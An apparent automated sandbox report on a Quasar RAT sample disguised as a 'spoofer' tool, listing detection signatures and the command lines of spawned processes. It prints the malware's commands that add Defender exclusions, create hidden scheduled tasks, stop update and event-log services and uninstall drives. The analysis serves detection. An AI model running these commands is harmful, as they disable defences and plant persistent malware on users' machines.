Malware Analysis Report

2025-01-18 04:20

Sample ID 231228-xkr96sdea7
Target SPOOFER.bin.exe
SHA256 18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc
Tags
quasar office04 evasion persistence spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc

Threat Level: Known bad

The file SPOOFER.bin.exe was found to be: Known bad.

Malicious Activity Summary

quasar office04 evasion persistence spyware trojan

Quasar RAT

Quasar payload

Nirsoft

Creates new service(s)

Stops running service(s)

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Maps connected drives based on registry

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Creates scheduled task(s)

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-28 18:55

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-28 18:55

Reported

2023-12-28 18:58

Platform

win7-20231215-en

Max time kernel

1s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe"

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A

Creates new service(s)

persistence

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe N/A

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.bin.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 1PJI-4306

C:\Users\Admin\AppData\Roaming\conhost_sft.exe

"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ClientC" /sc MINUTE /mo 5 /tr "'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Volumeid64V" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qDwW3x7lSK.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Music\Sample Music\smss.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Music\Sample Music\smss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\Public\Music\Sample Music\smss.exe'" /rl HIGHEST /f

C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe

"C:\Windows\assembly\NativeImages_v2.0.50727_32\SMDiagnostics\8218dc4808b77f3585fb048c61597af1\services.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Music\Sample Music\smss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Volumeid64" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Volumeid64V" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\it\Volumeid64.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Client" /sc ONLOGON /tr "'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "ClientC" /sc MINUTE /mo 9 /tr "'C:\Windows\Microsoft.NET\assembly\GAC_32\Client.exe'" /f

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 1PJI-4306

C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe

"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"

C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe

"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717864HP-TRGT27470MST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317864HP-TRGT27470DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617864HP-TRGT27470FU

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417864HP-TRGT27470FA

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517864HP-TRGT27470SL

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817864HP-TRGT27470SG

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217864HP-TRGT27470RV

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17864HP-TRGT27470AB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517881HP-TRGT15676SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617881HP-TRGT15676FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717881HP-TRGT15676MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317881HP-TRGT15676DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417881HP-TRGT15676FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817881HP-TRGT15676SG

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\ProgramData\VC_redist.x64.exe

C:\ProgramData\VC_redist.x64.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "driverupdate"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "driverupdate"

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 517897HP-TRGT3882SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 717897HP-TRGT3882MST

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 317897HP-TRGT3882DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 617897HP-TRGT3882FU

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 417897HP-TRGT3882FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 817897HP-TRGT3882SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217897HP-TRGT3882RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17897HP-TRGT3882AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 217881HP-TRGT15676RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 17881HP-TRGT15676AB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: E599-KPK5

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: E599-KPK5

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: Z7F8-9TBH

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: Z7F8-9TBH

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: UM6T-ZO0D

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: UM6T-ZO0D

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: BLKE-U3J4

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: BLKE-U3J4

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: EZAT-10UA

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: EZAT-10UA

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: H2H9-L1OA

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: H2H9-L1OA

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: N33L-K7M9

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: N33L-K7M9

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: E9LC-7ELM

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: E9LC-7ELM

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: SIC4-96Z2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: SIC4-96Z2

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: CNET-RFTN

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: CNET-RFTN

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: D6CT-S1IL

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: D6CT-S1IL

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 45B3-4O51

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 45B3-4O51

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4EMT-BP7S

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 4EMT-BP7S

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: POVC-BDRB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: POVC-BDRB

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TTCG-MGAK

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: TTCG-MGAK

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: IGI2-Z8TL

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: IGI2-Z8TL

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

